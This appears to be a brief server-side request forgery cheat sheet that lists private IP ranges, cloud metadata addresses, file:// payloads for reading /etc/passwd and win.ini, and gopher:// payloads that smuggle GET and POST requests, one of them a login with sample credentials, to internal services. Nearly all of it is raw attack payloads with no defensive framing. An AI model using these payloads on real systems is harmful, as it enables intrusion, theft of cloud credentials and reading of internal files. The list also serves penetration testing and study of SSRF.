Server-Side Request Forgery SSRF

Typical established ranges of private IP

IP address range 	Number of addresses
10.0.0.0/8 	        16,777,216
172.16.0.0/12 	    1,048,576
192.168.0.0/16 	    65,536

Internal Metadata for Cloud providers

AWS: 169.254.169.254
Google Cloud: metadata.google.internal

File schema

# Linux
file:///etc/passwd

# Windows
file:///c:/windows/win.ini

Gopher

curl gopher://127.0.0.1:9000/hello_gopher

# GET via Gopher
curl gopher://127.0.0.1:9000/_GET%20/hello_gopher%20HTTP/1.1

# POST via Gopher
curl gopher://127.0.0.1:80/_POST%20/status%20HTTP/1.1%0a

# note: this require double URL-encoding when using curl or Burp Suite
gopher://backend:80/_POST /login HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded

username=white.rabbit&password=dontbelate

------------------------------------------------------

gopher://localhost:9090/_POST%20/login%20HTTP/1.1%0aContent-Length:%2041%0aContent-Type:%20application/x-www-form-urlencoded%0a%0ausername=white.rabbit%26password=dontbelate